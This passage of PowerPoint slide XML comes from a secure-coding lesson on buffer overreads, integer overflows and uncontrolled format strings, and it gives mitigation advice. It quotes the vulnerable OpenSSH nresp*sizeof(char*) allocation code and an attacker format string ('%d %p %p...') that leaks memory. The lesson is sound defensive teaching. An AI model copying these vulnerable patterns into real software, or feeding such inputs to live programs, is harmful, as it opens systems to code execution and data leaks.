                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is -6 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arrayLen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is 9, then the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009DDC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> (which is outside the array) will be returned. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222301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22</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> location for each read operation remains within the buffer boundaries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> location for each read operation remains within the buffer boundaries.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Buffer Overread Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B7472B9-4E44-4948-A46E-EE0E205AF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14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Integer Overflows (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F2FCFB-F6EE-4231-B512-8F2A75234E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The result of an integer operation exceeds the size allowed for its storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding 1 to 127 should result in 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Putting the result in an 8-bit signed integer, will wrap, resulting in -128.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers can use this to change variables in ways the programmer didn't anticipate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An integer variable holds a sales tax amount.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker changes the tax from 8% to -128%, resulting in a refund, rather than a tax.</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2569639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Integer Overflows (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F2FCFB-F6EE-4231-B512-8F2A75234E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Integer overflow example (from OpenSSH):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>If nresp contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1073741824</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof(char*) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, then: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The result of the operation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nresp*sizeof(char*) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>overflows.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The argument to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xmalloc()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> is then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>A zero-byte buffer is then allocated, causing subsequent loop operations to overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This real-world defect in OpenSSH 2.9.9 through 3.3 enabled a remote attacker to execute arbitrary code during authentication.</a:t>
            </a:r>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB111029-53B3-4015-9E2D-E180BCDBB591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1752600"/>
            <a:ext cx="6999248" cy="1569660"/>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nresp = packet_get_int();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (nresp &gt; 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  response = xmalloc(nresp*sizeof(char*));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  for (i = 0; i &lt; nresp; i++) response[i] = packet_get_string(NULL);</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8098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25</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50" cy="5022560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use one of the following approaches:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upcasting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typecast the input values to the next larger primitive integer type. (This approach can't be used for long integers, which are already the largest primitive integer type.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the upcast values to perform each calculation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check each intermediate result to see if it would overflow the original integer type. Throw an exception if the range check fails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Downcast the final result to the original smaller type before assigning to a variable of the original smaller type.</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Integer Overflow Defects (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC80EFB3-C50B-470D-998E-98FE80279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53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26</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50" cy="5251160"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Precondition testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the input values for each arithmetic operation before you calculate to ensure that overflow cannot occur. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, to check that you can add two unsigned integers without an overflow (wraparound), you could subtract one of the values from the maximum value of an unsigned integer (e.g., UINT_MAX) to determine if there is room to add without an overflow. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if (UINT_MAX - uintA &lt; uintB) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Not enough room to add. Throw an exception.</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else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Enough room to add without overflow. Add and return result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the operation would result in overflow, throw an exception.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the operation would not result in overflow, perform the operation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and return the result.</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Integer Overflow Defects (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC80EFB3-C50B-470D-998E-98FE80279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92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Uncontrolled Format Strings (Slide 1 of 3)</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4020947"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your code might not contain buffer overrun defects, but standard libraries and third-party code that you use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—for example, code that implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>format strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format strings enable a programmer to provide character codes to determine how data values should be presented within a text string, such as a message to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="2454275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"The total amount is %d“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="2454275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decimal value: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2.45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="2454275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Results in: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"The total amount is 2.45"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%d shows a decimal value as text, and there are other values you can use, such as the %p parameter, which shows a pointer variable’s data buffer as text.</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3349143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Uncontrolled Format Strings (Slide 2 of 3)</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4020947"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be used by an attacker who can provide the format string value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker provides format string "I uncovered %d %p %p %p %p %p". </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 2.45 value is output as well as the data in the memory buffers indicated by the data values following the 2.45 value in memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depending on the situation, this approach:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might reveal the contents of memory to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might crash the program, enabling the attacker to perform a denial of service attack.</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64" name="Rectangle 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1931E816-932D-4A53-A35C-C08054A13887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397014" y="5281879"/>
            <a:ext cx="4531602" cy="592470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Format string: “I uncovered %d %p %p %p %p %p”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Result: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" kern="0" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I uncovered 2.45 and five unprotected secret values”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2290458" y="3455126"/>
            <a:ext cx="4563084" cy="1516962"/>
            <a:chOff x="2253322" y="4552462"/>
            <a:chExt cx="4563084" cy="1516962"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="Group 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB6CC524-F0E2-43CF-A995-1F9B98CEBE86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2253322" y="5162300"/>
              <a:ext cx="4295168" cy="296863"/>
              <a:chOff x="1617688" y="2054707"/>
              <a:chExt cx="5848544" cy="404225"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CFB9F4-2A4E-4D4F-9D60-8CF7DC93E112}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1617688" y="2054707"/>
                <a:ext cx="914402" cy="404198"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="en-US"/>
                </a:defPPr>
                <a:lvl1pPr algn="ctr"/>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>2.45</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="TextBox 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9BC0E53-A967-4BAB-905B-11AEECEFE543}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2532772" y="2054733"/>
                <a:ext cx="989233" cy="404198"/>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sz="1400" dirty="0"/>
                  <a:t>Value 1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="TextBox 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05E41ED9-D513-4DD8-9C23-AA7E4959503A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3522004" y="2054734"/>
                <a:ext cx="989233" cy="404198"/>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sz="1400" dirty="0"/>
                  <a:t>Value 2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="TextBox 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{532B5651-C626-499E-AE49-18CB9A62A351}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4511236" y="2054734"/>
                <a:ext cx="989233" cy="404198"/>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sz="1400" dirty="0"/>
                  <a:t>Value 3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="TextBox 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1986502B-44DE-4929-BA13-5EB3D9F8175C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5487768" y="2054734"/>
                <a:ext cx="989233" cy="404198"/>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sz="1400" dirty="0"/>
                  <a:t>Value 4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
